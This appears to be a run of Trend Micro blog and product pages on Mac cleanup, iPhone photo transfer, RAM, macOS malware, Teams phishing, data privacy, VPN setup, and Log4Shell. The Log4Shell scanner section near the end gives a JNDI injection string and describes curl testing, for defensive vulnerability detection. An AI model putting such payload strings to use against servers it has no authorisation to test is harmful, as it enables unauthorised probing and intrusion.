Because it can contain so many different kinds of files, the Other category is a difficult source of clutter to deal with, and frequently causes frustration to Mac users. In this article, we’ll show you the steps to take to clean it up — and get more from your Mac!
What Is Other on Your Mac’s Storage?
The Other category in Mac storage contains files that don’t easily fit into the typical categories of Document, Photo, App, Video, Audio, etc. Other storage on Mac can hold a wide range of files, including system files, temp. files, and cached files. But not all the files in the Other category on Mac are as easy to justify as cached files or archives. “Bloatware” (such as junk files) refers to programs that aren’t useful but take up a lot of space, decreasing performance.
The file types considered Other in Mac storage mayinclude:
MacOS system files and folders.
Temporary files.
Common document and file types (for instance, PDF, DOC, PSD).
Archives and disk images (such as ZIP, ISO, DMG).
App plugins, add-ons, and extensions.
Files from your library (such as Application support, iCloud files, and screensavers).
Cached files (user cache, browser cache, and system cache).
Files not recognized by a Spotlight search, such as a virtual machine hard drive.
How to Check Other Storage on Your Mac
1. Click the Appleicon in the top-left corner and select About This Mac.
2. Choose the Storage tab. You’ll see a chart showing the types of files that are taking up storage on your Mac. If you’re reaching your limit, it’s time to clear out that Other storage!
How to Find Other Storage Files on Your Mac
1. Open Finder and click Go in the menu bar.
2. Select GotoFolder.
3. Enter ~/Library and press enter (or click Go).
4. The library will appear, which contains all files and folders categorized as Other. What follows is quite a risky and time-consuming process. Besure to do your research and know your file names — as the wrong deletion can be catastrophic.
The One-Stop Solution: Trend Micro’s Cleaner One Pro
Cleaner One Pro is an easy-to-use, all-in-one disk cleaning and utility optimization app that will help you boost your Mac’s performance. It will take care of the Other problem automatically.
Cleaner One Pro includes several housecleaning tools, including:
Memory Optimizer
Junk Cleaner
File Scanner
Duplicate Files Finder
App Manager
File Shredder
Memory Disk map
These functions are all rolled into one easy-to-use interface for maximum efficiency and simplicity. Click the link above or the button at the bottom of this page to get more from your Mac.
How to Delete Other Storage on Your Mac
After successfully opening the window above, you now want to go through these three primary folders:
When you’re done going through these folders and deleting as necessary, empty the Trash and restart your Mac. But be careful what you delete — you do not want to jeopardize your device by deleting the wrong file!
Furthermore, while deleting files, remember that the Other label DOES NOT signify junk files. Some files in this category exist for a reason: for example, some cache files are needed in order to make your system work faster, while ZIP archive files can contain important system documents and data. Good luck!
As always, if this article has been of use and/or interest to you, please do SHARE it with family and friends to help keep the online community secure and protected.
Eventually, if you’re shutter-happy enough, you’ll need to transfer your iPhone’s photos to your Mac to save the precious space on your mobile device. Simply sending a few photos as an email attachment is fine for a small number of photos, but in this article, we share several easier and more convenient ways of exporting your iPhone’s photos to your Mac.
Transfer Photos from iPhone to Mac with a USB Cable
Connecting your device using a Lightning-to-USB cable is the most common way of transferring pictures from an iPhone to a Mac. Below are several ways you can do this using a few different apps.
How to Use Finder to Transfer Photos from iPhone to Mac
Starting with macOS Catalina, there is no iTunes. However, you can easily sync your iPhone with your Mac using Finder. Here’s how to do it:
1. Connect your iPhone to your Mac with a Lightning-to-USB cable. 2. Open Finder. Your iPhone should appear in Finder’s sidebar under Locations.
3. In the sidebar, select your iPhone. If prompted, confirm that you trust your iPhone. 4. Click Get Started.
5. At the top of the window, click Photos and then check the Sync photos to your device from: box.
6. Use the drop-down menu to choose the folder or app on your iPhone that you want to sync photos from. 7. Use the checkboxes at the bottom of the window to choose whether you want to sync all your photos and albums or only selected albums. 8. Click Apply.
How to Use the Photos App to Transfer Photos from iPhone to Mac
Below are instructions on how to transfer photos from iPhone to Mac using the Photos app:
1. Connect your iPhone to Mac using a Lightning-to-USB cable. 2. Once prompted, confirm that you are using a trusted device. You will only need to do this if you haven’t synced your photos using this method before. 3. Open the Photos app on your Mac if it doesn’t automatically open. 4. In the sidebar, select your iPhone.
5. In the upper menu of the Photos app, choose Import. 6. Click Import All New Photos, or select the photos you need and click Import Selected.
Use Image Capture to Transfer Photos from iPhone to Mac
Another method for transferring photos from your iPhone to your Mac involves using the native Image Capture app. This method lets you quickly and easily download your photos to a folder of your choice.
It is primarily intended for use with digital cameras and scanners, but it can also be used with iPhones with no issue.
1. Connect your iPhone to your Mac using a Lightning-to-USB cable and allow access to the device when prompted. 2. Open Image Capture on your Mac. 3. In the sidebar, select your iPhone under the Devices category. 4. At the bottom of the window, use the Import To drop-down menu to choose the location to save your pictures.
5. Select the pictures you want to import and click the Download button, or if you want to transfer all your photos, click Download All.
Transfer Photos from iPhone to Mac wirelessly
There are several options for transferring photos even if you don’t have a Lightning-to-USB cable. Here they are:
Use AirDrop to Transfer Photos from iPhone to Mac
AirDrop works great for transferring photos between your iPhone and Mac, and vice versa. Please ensure both devices are connected to the same Wi-Fi network and no more than around 30 feet from each other.
1. First, make sure your Mac is discoverable by everyone. Open Finder on your Mac, click Go in the menu bar, and select AirDrop. A Finder window will open with the AirDrop icon at the bottom.
2. Make sure that Everyone is selected under the Allow me to be discovered by: drop-down menu. 3. On your iPhone, open the Photos app and select the pictures you want to transfer. 4. Tap the Share button and select AirDrop.
5. Select the device you want to transfer your photos to and click Done. Depending on your Mac’s settings, you may be asked where you want to save the photos.
Use iCloud to Transfer Photos from iPhone to Mac
iCloud lets you synchronize your photos between your iPhone and Mac. Because the two devices will be regularly synchronized, this method is very efficient.
1. Make sure to sign in to your Apple ID on your iPhone and Mac and that they are both connected to Wi-Fi. 2. On your iPhone, go to Settings > Your Apple ID > iCloud > Photos. 3. Enable the slider next to iCloud Photos.
4. On your Mac, go to the Apple menu and select System Preferences. 5. For macOS Catalina or later (Big Sur and Monterey), go to iCloud or Apple, then choose iCloud. 6. Check the boxes next to iCloud Drive and Photos.
Note: remember to switch off sync after transferring if you want to delete photos on your iPhone and keep them on your Mac because as long as sync is enabled, any changes you make to photos on one device will automatically be synced to the other.
Got lots of duplicates?
Transferring photos to your Mac is a great way to reclaim some of the precious storage space on your iPhone, but if you’ve got lots of duplicate photos, you’re going to have a nightmare of a time sorting through them on your Mac. Fortunately, Cleaner One Pro is on hand to help out!
Cleaner One Pro makes the time-consuming process of finding and removing similar photos and duplicate files a thing of the past! Simply run a quick scan on your Mac to detect and remove everything hogging storage space.
If your Mac frequently performs slowly or freezing all the time, you see a “Your system has run out of application memory” message or occasionally seeing the dreadful spinning beach ball, chances of these can be signs that your memory, or RAM, is being used to the max.
What is RAM on Mac?
Random Access Memory (RAM) is a computer’s temporary data storage device. It stores the information the computer is actively using so that it can be accessed quickly. The more running programs your computer has, the more it uses memory to perform properly. It’s essential for your computer to work properly.
It is different from the internal storage on your Mac. You keep all your files in internal storage but you can’t choose what to save in your RAM as your computer needs flexibility in moving files in or out of that memory all the time.
It works similarly like when you are working in an office. The bigger the office the more people can do different tasks simultaneously. Like in a computer, the more RAM you have the more process your computer can handle at once.
When you launch a program, your computer gathers the program’s files from the hard drive. Once the files are retrieved, the computer needs a working area to process the data and allow you to interact with it. This is your RAM. Your computer places your program’s files in RAM temporarily while you are working with them so that your computer can access that information faster and efficiently.
Why it is necessary to Add more RAM
By default, most Macs were shipped with around 8GB of RAM. Old files and cluttered caches can reduce your Mac’s available RAM and cause your system to slow down. Some applications require a lot of RAM to work efficiently, such as video editing apps and 3D design software.
Adding more RAM is one of the easiest, most cost-effective ways to improve the performance of your MAC, primarily because most computers are shipped with a minimal amount of memory.
Free up Memory with System Activity Monitor
If installing more RAM isn’t an option, you can start looking at the Activity Monitor to show how much memory is being used – that will help you identify if an app is using up more than it should be.
Activity Monitor comes with your Mac. You can find it in Utilities, or start typing Activity Monitor into Spotlight. If you select the Memory tab, this shows a list of all the active apps and processes on your Mac and how much memory each of them is using.
You should see a Memory Pressure chart and the breakdown of how your memory is being used.
The most important thing to look at is the Memory Pressure chart, which shows up in green, yellow, or red based on whether your Mac needs more RAM or not. If it is all green, it means your RAM is still efficient. Yellow means your Mac might be needing an upgrade, and red means your Mac definitely needs that added RAM.
When you find the suspect app to be using resources even though you weren’t using them, select it and click on Information (i).
This will show more information about the process including the memory it used. If you want to close this app, you can just click on Quit. Then it will ask if you are sure to quit this process. You can choose Quit or Force Quit. Force Quite is useful for frozen apps.
Note: If you are not familiar with the process, it’s better not to close as it may be required by your Mac.
Reduce Memory Usage on Mac
We now know the fix we can do when our Mac is running out of memory. It is still better if we can prevent it from happening especially if we only have limited options to upgrade our Mac’s memory.
There are a few things you can do to maximize what is available. This may also help speed up your Mac.
1. Make your Desktop Clean all the time.
Cluttered documents, images, and different types of files are worth cleaning or at least sorting them to a different folder/location. The macOS is designed to manage your Desktop icon as an active window. The more icons the more memory will be used.
2. Manage Memory Usage in Finder
The Finder application is designed by default to show all files available on the system. Try changing the default display of Finder to not show All My Files.
Open Finder and click on Finder > Preferences
Under General choose a folder to be shown when you open a new Finder window.
3. Close Unwanted Finder Windows or merge them.
Each Finder window can have an impact on RAM usage. You can close them all at once by using the keyboard shortcut, pressing Command + Option + W, or merging all the Finder windows together.
In the Finder, click on Window > Merge All Windows.
4. Disable Items that launches at Start up
Check if there are apps set to run during start-up or after you log in on your Mac as most of these might not be really essential for your everyday use of your computer.
How to stop apps from starting automatically:
Open System Preferences > Click on Users & Groups.
Click on your User name on the sidebar on the left if that’s not already selected.
Click on Login Items.
Select an app in the list that you don’t want to run during startup and click on the (-) button.
5. Close web browser tabs
It’s best practice to keep minimal open browser tabs at the same time as recent macOS will see the websites open in Safari listed as a separate process in Activity Monitor. It would also be best to close Safari or the browser you use from time to time.
6. Delete browser extensions
Browser extensions are tools for quick access to features while surfing the internet. But sometimes they just consume more memory. Check your browsers for unwanted browser extensions you don’t really need.
7. Free up more disk space on your Mac
You may also need to clear some space on your Mac from time to time. The recommendation is to keep 20% of your drive space free. You could delete large unused files, old downloads, and old apps. Large unused files can be installer packages you used a long time ago that you already forgot. You can also look for duplicate files or similar photos.
Best App to Free up RAM and Optimize memory usage on Mac
Cleaner One Pro is an all-in-one disk cleaning app with an easy-to-use interface so you can effortlessly visualize, manage and free up your storage space to keep your Mac optimized for the best performance.
Its key features include:
Quick Optimizer – Quick Optimizer monitors your CPU Usage, Network Usage and Memory Usage, while scanning and deleting Junk Files in just one click.
Junk Files – Remove temporary files and hidden hidden leftover files in one click.
Similar Photos – Offer an abundance of useful features to get rid of similar looking images.
Big Files – Filter and manage large files on your disk and free up more storage space.
Disk Map – Analyze your storage usage in a visual and interactive map.
Duplicate Files – Retrieve and delete duplicate files.
App Manager – View and manage apps by name, size or date. Remove unwanted apps and associated files. Batch remove multiple apps.
Startup Manager – Easily manage startup apps and services. Speed up boot time and enhance the performance.
Cleaner One Pro is available from Apple’s App Store and the Trend Micro website. Download and claim your free trial today!
You may check our article about Cleaner one Pro for more information:
Japanese cybersecurity software firm Trend Micro has patched a high severity security flaw in the Apex Central product management console that can let attackers execute arbitrary code remotely.
Apex Central is a web-based management console that helps system admins manage Trend Micro products and services (including antivirus and content security products and services) throughout the network.
They can also use it to deploy components (e.g., antivirus pattern files, scan engines, and antispam rules) via manual or pre-scheduled updates.
The vulnerability (CVE-2022-26871) is a high severity arbitrary file upload weakness in the file handling module that unauthenticated attackers can abuse for remote code execution.
On Thursday, Trend Micro said it observed attempts to exploit the vulnerability in the wild as part of an ongoing attack.
“Trend Micro has observed an active attempt of exploitation against this vulnerability in-the-wild (ITW) in a very limited number of instances, and we have been in contact with these customers already,” the company said.
CISA orders federal agencies to patch
The Japanese antivirus vendor also urged customers of affected products (on-premise and as a Service) to update to the latest released version as soon as possible.
“Please note that the SaaS version has already been deployed on the backend and no further action is required from SaaS customers on this issue,” the company added for SaaS customers.
When asked how many customers were targeted in these attacks and if any of their networks were breached following these exploitation attempts, Trend Micro spokesperson Funda Cizgenakad told BleepingComputer that the company is “not able to comment on customers” since “this is confidential.”
The cybersecurity agency also urged private and public sector organizations in the US to prioritize patching this actively exploited bug to decrease their networks’ exposure to ongoing attacks.
CISA added the Trend Micro flaw to its Known Exploited Vulnerabilities Catalog, a list of security bugs exploited in the wild, with seven others, including a critical Sophos firewall bug.
It is commonly believed that Macs are immune to viruses. However, although they are less vulnerable than Windows computers, the reality is that MacBooks, iMacs, and Mac minis are still susceptible to malware and other security vulnerabilities — and there are some worrying ones out there, too.
Below are the top 5 macOS malware programs, security flaws, and vulnerabilities that you need to be aware of!
Silver Sparrow
Disclosed by Red Canary researchers, Silver Sparrow is a unique macOS malware program that was created to target Apple’s new M1 processors.
Silver Sparrow is a PUA (potentially unwanted application) that can serve as a delivery mechanism for malware. Once your device is infected it will contact a server every hour. It is still currently unknown how much of a threat Silver Sparrow truly poses, but in theory, it could act as a catalyst for significant attacks.
Apple quickly released an update to macOS that stopped Silver Sparrow from being able to be installed. Therefore, if you have a fully updated version of macOS, you are safe from Silver Sparrow.
XLoader
It was all but guaranteed that one of the most common pieces of Windows malware would make its way to macOS. Initially reported by Check Point security researchers in July 2021, it was confirmed that a Mac version of the XLoader malware had actually been around for some time.
XLoader is a new variant of the infamous Formbook, a program used to steal login credentials, record keystrokes, and download and execute files.
Once a device is infected with XLoader, it transfers a hidden application bundle containing a copy of itself to the user’s home folder, and what is particularly dangerous about it is the fact that it can run completely undetected by macOS.
XCSSET
Initially reported by Trend Micro in August 2020, XCSSET primarily targets macOS users in Asia. Many experts believe that XCSSET mainly targets Chinese gambling sites and their users.
XCSSET replaces users’ web browser icons with fake versions that launch malware whenever opened. XCSSET can bypass macOS’s privacy protections by hijacking the privileges of legitimate apps, allowing it to take screen captures.
XCSSET seeks to access information via the Safari browser, including login details for various Apple, Google, PayPal, and Yandex services. Other types of information it can collect include notes and messages sent via Skype, Telegram, QQ, and WeChat.
macOS Big Sur IOMobileFrameBuffer
This vulnerability can allow attackers to take over an affected system. It is a critical memory corruption issue found in internal component extensions in macOS. This security flaw allows the installation of malicious applications and enables them to execute commands with system administrator privileges — bypassing macOS’s built-in security measures.
The issue was addressed immediately by Apple, with a fix released in the macOS Big Sur 11.5.1 July 26, 2021 update.
Log4Shell
Log4Shell is a vulnerability in the widely used Java library Apache Log4j — software used by an innumerable number of large companies including Google, Apple, Netflix, Twitter, and many more. It enables attackers to perform remote code execution and gain control over affected servers.
Log4j is an open-source logging tool used by a huge number of websites and apps. Because it is so widely used, the number of services at risk of exploitation is incredibly concerning.
Although macOS is not directly affected by Log4Shell, according to security researchers, the vulnerability has been found to affect Apple’s iCloud platform. Luckily, Apple was quick to patch the vulnerability — releasing a fix shortly after it was discovered.
It was estimated that around 850,000 attacks were attempted within just 72 hours of the initial outbreak. It is not clear if Apple’s iCloud was among the services targeted.
Apache has already released an update fixing the vulnerability, although because of Log4j’s widespread worldwide use, the prospect of all the apps that use it receiving the fix is simply not realistic.
However, even if you use one of the compromised apps, your Mac will not be at risk. When exploited, the bug affects the server running Log4j, not the computer itself. Although in theory the exploit could be used to plant a malicious app on a server that then affects connected machines.
Stay protected at all times
Malware creators will always seek out undiscovered vulnerabilities that they can exploit, and Macs are certainly not immune. Fortunately, security researchers are often exceptionally quick at discovering these vulnerabilities, and fixes are almost always released timely.
However, it is best practice to always use a trusted antivirus app to ensure you are as protected as possible against all types of threats.
Trend Micro’s Antivirus One — the best option for complete peace of mind
Antivirus One can protect your Mac from viruses, malware, and adware, block potential web threats and safeguard against vulnerabilities.
Some key features include:
Fast Thorough Scans — Scan your Mac for hidden threats in less than a minute.
Web Threat Protection — Avoid online fraud, malicious software embedded in websites, and other threats lurking on the web.
Data Privacy Sweeps — Clear personal information out of Safari, Google Chrome, and Mozilla Firefox before it leaks online.
Even with email-based phishing attacks proving to be more successful than ever, cyberattackers are ramping up their efforts to target employees on additional platforms, such as Microsoft Teams and Slack.
One advantage is that in those applications, most employees still assume that they’re actually talking to their boss or coworker when they receive a message.
“The scary part is that we trust these programs implicitly — unlike our email inboxes, where we’ve learned to be suspicious of messages where we don’t recognize the sender’s address,” said Armen Najarian, chief identity officer at anti-fraud technology firm Outseer.
Notably, traditional phishing has seen no slowdown: Proofpoint reported that 83% of organizations experienced a successful email-based phishing attack in 2021 — a massive jump from 57% in 2020. And outside of email, SMS attacks (smishing) and voice-based attacks (vishing) both grew in 2021, as well, according to the email security vendor.
However, it appears that attackers now view widely used collaboration platforms, such as Microsoft Teams and Slack, as another growing opportunity for targeting workers, security researchers and executives say. For some threat actors, it’s also a chance to leverage the additional capabilities of collaboration apps as part of the trickery.
Sophisticated Teams attacks
Patrick Harr, CEO of phishing protection vendor SlashNext, told VentureBeat that a highly sophisticated phishing attack recently struck a customer on Microsoft Teams.
It happened, Harr said, while the CEO of the customer company was traveling to China. Posing as the CEO, an attacker sent a WhatsApp message to several of the company’s employees, asking them to join a Teams meeting.
Once in the meeting, the employees saw a video feed of the CEO, which they didn’t realize had been scraped from a past TV interview. As part of the trick, the attackers had added a fake background to the video to make it appear the CEO was in China, Harr said.
But since there was no audio, the “CEO” said that there “must be a bad connection” — and then dropped a SharePoint link into the chat.
Posing as the CEO, the attacker told the employees that “‘since I can’t can’t make this work, send me the information on this SharePoint link,’” Harr said.
An employee did end up clicking on the malicious SharePoint link — but they were blocked from accessing the page.
Ultimately, the incident demonstrates that “these bad actors are nesting themselves in legitimate services,” Harr said. “They’re getting very creative. They’re staying ahead of the curve.”
A big target
Microsoft Teams is massively widespread in the enterprise, with 270 million monthly active users, and that’s led attackers to take notice.
Threat actors have spotted a few of other things about Teams, too: If you can acquire an account’s Microsoft Office 365 password, that can potentially get you into Teams as well. And while more workers may be savvy about email phishing techniques at this point, they’re less likely to be suspicious about a Teams message, according to researchers.
Attackers are seizing the opportunity: In January, email security platform Avanan saw thousands of attacks involving malware dropped into Teams conversations, researchers at the Check Point-owned organization reported.
By attaching a malicious executable file in a Microsoft Teams conversation, “hackers have found a new way to easily target millions of users,” the Avanan researchers wrote in a blog post. When clicked, the .exe file installs a Trojan on a user’s Windows PC, and the Trojan then installs malware.
The attacks are having success because with Microsoft Teams, unlike with email, “end-users have an inherent trust of the platform,” the researchers wrote.
Ultimately, the incidents reported by Avanan show that “hackers are beginning to understand and better utilize Teams as a potential attack vector,” the researchers said.
In other words, as they are known to do, cyberattackers are evolving once again.
‘The new BEC’
Referring to the Microsoft Teams attacks cited by Avanan, “this is the new business email compromise / legitimate service abuse,” said Sean Gallagher, a senior threat researcher at Sophos Labs, in a tweet. “It follows the trend we’ve seen with Slack and Discord.”
Business email compromise (BEC) describes a type of phishing attack in which an attacker targets a certain individual in a company, and attempts to persuade the individual to perform a wire transfer of funds to their account.
BEC attacks “are not losing their effectiveness,” Gallagher said in an email to VentureBeat. Indeed, 77% of organizations faced business email compromise attacks last year, up from 65% in 2020, according to Proofpoint data.
But with the arrival of BEC-like attacks on collaboration platforms such as Microsoft Teams, “malicious actors are expanding their attack surface and finding new ways to get a foothold into organizations,” Gallagher said.
“As more businesses move toward the cloud and software-as-a-service [SaaS] models, legitimate hosted services – like Microsoft Teams and Slack – will be an attractive avenue for attackers,” Gallagher said.
Najarian agreed that BEC attacks “are still very effective for criminal hacker groups.”
“But expanding their tactics into Microsoft Teams, Slack, Discord and other chat apps presents another revenue driver for them,” Najarian said in an email.
Combining tactics
Notably, the types of Microsoft Teams attacks reported by SlashNext and Avanan involve a combination of social engineering and credential harvesting.
“If malicious actors secure credentials and can access a Microsoft 365 environment in the cloud, they can act as a trusted team member,” Gallagher said. “As such, victims assume the files and links shared in the legitimate service are trusted, since they do not display the tell-tale signs of a malicious URL once uploaded or shared in the trusted environment.”
Adversaries can “get into all sorts of places in the enterprise that they otherwise wouldn’t be able to access without compromising the network,” he said.
All in all, legitimate service abuse is an emerging vector for malicious actors to target the enterprise, he said — and it will only continue to grow “as the enterprise becomes more detached from traditional infrastructure.”
The privacy of our data has always been important. However, because we’re sharing more of it than ever before, being aware of data privacy and taking the necessary steps to protect it has never been more crucial. In this article, in celebration of Data Privacy Week, we cover why data privacy is so important, what can happen if your data were to fall into the wrong hands, and what you can do to protect your personal data.
Find out if your email address appeared in any data leaks
What is data privacy and why is it important?
Data privacy often refers to the practice of handling sensitive data in line with regulatory requirements. In most developed countries, there are specific data privacy laws in place that regulate how companies can collect, store, and share customer data.
While the EU has a comprehensive data privacy law, the General Data Protection Regulation (GDPR), which covers all different types of data, only three US states currently have similar, all-encompassing data privacy laws (California, Virginia, and Colorado). Instead, the US has many different laws designed to target specific types of data. For example, the Fair Credit Reporting Act (FCRA) protects information in your credit report, and the Family Educational Rights and Privacy Act (FERPA) protects students’ education reports from being freely accessible.
However, because of how much time we spend online nowadays, we’re putting more of our personal data out there for others to see than ever before. As a result, it is not only important to understand how protected your data is when you share it with a company, but also how private it is when you share it online.
How to protect your data privacy
Here are some of our top tips for data privacy protection:
Only give your data to trustworthy companies and websites — Perhaps you’ve come across a new online clothing store or seen an app on the app store that takes your fancy, but you’re unsure if you can trust the company. If you’ve never heard of the company before, it’s best to do some quick research to learn whether or not you can trust it with your data.
Think twice before sharing — With social media being such a big part of our everyday lives, it’s easy to forget that what we post online, stays online forever. Always think twice before sharing something online. Don’t publicly share personal information such as your address, phone number, or social security number.
Take advantage of privacy settings — On every website, app, and game that you use, make sure you’re taking advantage of the built-in privacy settings. By doing so, you’ll ensure that only people you know can view your information.
Use strong passwords and enable 2FA — When you create an online account, you almost always need to share lots of personal data — your full name, email address, and date of birth, for example. Although this data isn’t publicly accessible, if a hacker were to gain access to one of your accounts, they would be able to see all this information. To avoid this happening, make sure to use only strong, tough-to-hack passwords and that all your accounts have two-factor authentication (2FA) enabled.
Use a VPN on public Wi-Fi — Unprotected Wi-Fi networks are notoriously unsecure. Because no password is required to access them, nearby hackers can steal any data transferred over them. To protect yourself, always use a VPN on public Wi-Fi networks.
Data leaks in 2021 — T-Mobile, LinkedIn, Moncler & CoinMarketCap
The truth is, no matter how well a company abides by data privacy laws and how thoroughly it protects its customers’ data, it can never be 100% data leak-proof. In 2021 alone, a shocking number of companies suffered high-profile data leaks, including T-Mobile, LinkedIn, Moncler, and CoinMarketCap. Those leaks resulted in hundreds of millions of people having their sensitive personal data leaked, which is used by criminals to commit all sorts of crimes — with the most concerning of them all being identity theft.
According to the Federal Trade Commission, there were over 1 million reports of identity theft in 2021. Below are some of the things the FTC says criminals can do with your data:
Get new credit cards in your name.
Open a phone, electricity, or gas account in your name.
Steal your tax refund.
Get medical care under your name (and leave you with a huge bill!).
Pretend to be you if they get arrested.
Cybercriminals often put stolen data up for sale on underground forums on the regular internet, as well as the dark web. And as you can imagine, personal information that is particularly valuable to them can fetch a high price. On average, on the dark web, a driver’s license will go for $205, an ID card for $213, and a passport sells for a whopping $684!
How to stay protected from data leaks
You might be thinking that staying protected from data leaks is an impossible task, but the answer is easy: Trend Micro™ ID Security . Available for Android and iOS, Trend Micro™ ID Security can scan the internet and the dark web 24/7 for your personal information. If your data is leaked, the app notifies you immediately so you can take action to avoid people stealing your identity. If your information is out there, you’ll be the first to know!
Here are some of the features offered by Trend Micro™ ID Security :
Personal Data Protection Score — See exactly how safe your online personal data is with your customized Protection Score.
24/7 Comprehensive Personal Data Monitoring — ID Security can scan the internet and the dark web for all your personal information including up to 5 email addresses and bank account numbers, 10 credit card numbers, your Social Security number, and lots more.
Social Media Account Protection — Strengthen the security of your social media accounts. Be instantly alerted if your Facebook or Twitter account’s data is leaked by cybercriminals.
If you value your security and privacy, then a VPN is an absolute necessity. A VPN, or virtual private network, stops others (even your internet service provider) from snooping on your online activity by routing all your internet traffic through a secure, encrypted tunnel. VPNs work especially well for guaranteeing that you’re protected even when using unsecured public Wi-Fi networks, too.
And nowadays, with all of us using our mobile devices more than ever before to get online, it is essential that our cell phones are equipped with a VPN so we can be fully protected on the go.
How can I set up a VPN on my iPhone?
There are two ways to accomplish this. The first method — and the one that will be most suitable for the majority of people — is to choose a VPN provider and then download and install its app from the Apple App Store. In general, the process will be super easy and the installer will guide you through any settings that you may need to configure.
Take VPN Proxy One Pro for example. The setup process simply couldn’t be any easier. Within minutes of downloading the app from the App Store (click here to do this, by the way), your iPhone will be protected by world-leading encryption and you’ll be free to connect to the internet safely, even on public Wi-Fi networks.
The second method, which is outlined below, is only recommended for those who are a little more tech-savvy. This option is perfect for people who want more control over their VPN experience and don’t mind putting in the extra time and effort to get it. This method allows you to choose which protocol you use as well as customize other settings, but it does require some additional knowledge.
But before we explain the second method, we need to quickly talk about VPN protocols…
What are the VPN protocols natively supported by iOS?
Before you can manually set up a VPN on your iPhone, you’ll need to select which VPN protocol you wish to use. Here are the ones that natively work with iOS:
L2TP
L2TP (Layer 2 Tunneling Protocol) is a type of tunneling protocol. Because L2TP does not offer any encryption on its own, it is normally paired with IPSec (see below). The two technologies form an excellent partnership and together provide great security. It is not as fast as some other options, however.
IKEv2
Just like L2TP, IKEv2 (Internet Key Exchange version 2) also doesn’t offer any encryption of its own, so must also be paired with IPSec. It is faster than L2TP and works particularly well with mobile devices because it can easily move between connection types (Wi-Fi to a cellular network, for example). Although it was jointly developed by Microsoft and Cisco, it is still natively supported by iOS.
IPSec
IPSec (Internet Protocol Security) is also natively supported by iOS and can be used on its own as a VPN protocol.
How to manually set up a VPN on iPhone
Once you’ve decided on which protocol to use, to manually configure a VPN on iOS, go to Settings > General > VPN > Add VPN Configuration > Type. From here, you can select either IKEv2, IPSec, or L2TP (which actually comes with IPSec, even though it isn’t made clear).
After selecting the VPN protocol type, you will need to fill out the other details. Most of the additional information should be available on the VPN provider’s website, either in your account settings or in the online documentation, but if you are unsure of where to find anything, it is best to contact them directly.
Once you’ve filled in all the required information, click Done in the right-hand corner and you’re good to go!
Stay connected, stay secure
If you, like most of us, rely on your mobile device to stay connected, then the value that a VPN offers simply cannot be understated. With everyone using their mobile devices for so much these days — email, social media, online shopping, etc. —when it comes to protecting our sensitive data and safeguarding our privacy, VPNs are effectively essential.
Regardless of how you go about setting up your VPN on your iPhone — whether you choose to just quickly download and install the app or configure each of the settings individually, VPN Proxy One Pro is a truly excellent choice. Click the button below to read more about it.
This web-based tool can help identify server applications that may be affected by the Log4Shell (CVE-2021-44228, CVE-2021-45046) vulnerability.
It allows you to generate a request that you can run in your environment and test if the server is vulnerable.
There are three options for using this tool:
Use the generated JNDI snapshot and add that entry to any of the form fields on the site or add this to the HTTP Header for User-Agent.
Your unique JNDI snapshot is ${jndi:ldap://log4j-tester.trendmicro.com:1389/b64c656f-ffcb-4fda-a06b-a4b8753e03cb}
For Internal Server: Generate a quick curl command to test your servers.
For Public Facing Server: Just provide the address of the server and we will try to create a simulated query. Make sure you are hitting some API endpoint/form which eventually does an action in the backend. If the unique ID provided here shows up in the results section below, the server may be vulnerable and should be investigated further. If it does not show up, it does not guarantee that the server is not vulnerable.
Use the following tool to test your application endpoints. GET POST with User-Agent HTTP Headerwith X-Api-Version Headerwith URL Parameterswith Form Datawith custom HTTP HeaderObfuscate data
System environment variables
System properties
Lower/Upper
Lower special
Send request
You can use the generated cURL command below for testing:URL
curl...
Windows Mac/Linux
Results
If you submit and see results here, that means the server may be vulnerable and should be investigated further. If there are no results, it does not guarantee that the server is not vulnerable. This table will be refreshed every 10 seconds.
Next refresh in 4 seconds.
Unique ID
Timestamp
Information
CVE-2021-44228
“Log4Shell” and “Logjam.” Apache Log4j2 <=2.14.1 is vulnerable to remote code execution by downloading code from LDAP server using JNDI.Read more
CVE-2021-45046
Apache Log4j 2.15.0 is vulnerable to a denial of service (DOS) attack when using ThreadContext values and context lookups.Read more
Protection and Investigation
Analysis and Advisory – From Trend Micro Threat ResearchRead more
Credits
Trend Micro’s vulnerability scanner is based on the following projects:
On December 9, 2021, a new critical 0-day vulnerability impacting multiple versions of the popular Apache Log4j 2 logging library was publicly disclosed that, if exploited, could result in Remote Code Execution (RCE) by logging a certain string on affected installations.
On December 14, 2021, information about a related vulnerability CVE-2021-45046 was released that recommended that users upgrade to at least version 2.16.0+ of Log4j 2.
Based on our analysis, the rules and protections listed below for CVE-2021-44228 are also effective against CVE-2021-45046.
On December 28th, yet another RCE (CVE-2021-44832) was discovered and disclosed. Although not as critical as the initial vulnerabilities (CVSS 6.6), it is still recommended that administrators do their due diligence to update to the latest version available (2.17.1).
Background
Log4j is an open-open source, Java-based logging utility that is widely deployed and used across a variety of enterprise applications, including many cloud services that utilize Apache web servers.
The vulnerability (assigned as CVE-2021-44228) is a Java Naming and Directory InterfaceTM (JNDI) injection vulnerability in the affected versions of Log4j listed above. It can be triggered when a system using an affected version of Log4j 2 includes untrusted data in the logged message – which if this data includes a crafted malicious payload, a JNDI lookup is made to a malicious server. Depending on the information sent back (response) a malicious Java object may be loaded, which could eventually lead to RCE. In addition, attackers who can control log messages or their parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
The challenge with this vulnerability is widespread use of this particular logging utility in many enterprise and cloud applications. JDNI lookups support multiple protocols, but based on analysis so far, exploitability depends on the Java versions and configurations. From a practical standpoint, just because a server has implemented an affected version of Log4j 2, it does not automatically mean it is vulnerable depending on its configuration.
Trend Micro Research is continuing to analyze this vulnerability and its exploits and will update this article as more information becomes available. A comprehensive blog with more background information can be found here .DETAILS
Protection Against Exploitation
First and foremost, it is always highly recommended that users apply the vendor’s patches when they become available.
A new version of Log4j 2 has been released which reportedly resolves the issue: Version 2.17.1 is now availableand is the suggested update. Users with affected installations should consider updating this library at the earliest possible time.
Note: due to additional waves of new exploits, the previous manual mitigation steps published have proven not to be sufficient and have been removed.
Trend Micro Protection and Investigation
In addition to the vendor patch(s) that should be applied, Trend Micro has released some supplementary rules, filters and detection protection that may help provide additional protection and detection of malicious components associated with this attack servers that have not already been compromised or against further attempted attacks.
Trend Micro Log4j Vulnerability ScannerTrend Micro Research has created a quick web-based scanning tool that can help users and administrators identify server applications that may be affected but the Log4Shell vulnerability.The tool can be found at: https://log4j-tester.trendmicro.com/ and a demo video can be found at: https://youtu.be/7uix6nDoLBs.
